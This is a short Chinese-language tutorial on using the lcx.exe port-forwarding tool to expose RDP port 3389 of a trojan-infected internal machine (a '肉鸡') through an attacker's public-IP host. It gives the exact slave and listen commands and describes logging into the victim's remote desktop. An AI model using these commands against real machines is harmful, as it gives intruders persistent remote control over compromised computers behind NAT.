windows端口转发工具（LCX）

端口转发（Port forwarding），有时被叫做隧道，是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为，其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址（局域网内部）上的一个端口。

这里我就用工具是Lcx，Lcx.exe是一个端口转发工具，相当于把肉鸡A上的3389端口转发到具有外网IP地址的B机上，这样连接B机的3389端口就相当于链接A机的3389端口。Lcx程序多用于被控制计算机(肉鸡)处于内网的情况，被控制机可能中了木马程序，虽然能够进行控制，但还是没有使用远程终端登陆到本机进行管理方便，因此在很多情况下，都会想方设法在被控制计算机上开启3389端口，然后通过lcx等程序进行端口转发，进而在本地连接到被控制计算机的远程终端并进行管理和使用。

先开启 Windows xp 查看内网IP信息

在目标机器上执行lcx.exe -slave 公网ip 端口 内网ip 端口

例如：lcx.exe –slave 154.223.*.* 51 192.168.*.* 3389 将内网的3389端口转发到公网的51端口

然后在公网的机器上：Lcx.exe –listen 监听51端口，转发到公网机器的3389端口

例如：Lcx.exe –listen 51 3389

这个时候已经将内网的3389转发到了公网机器的3389端口，我们在本地机器上远程公网IP 3389 ，就连接上了内网机器的3389，此时已经成功登陆进来，我们查看IP，可以看到是目标机器。

文章来源：黑白之道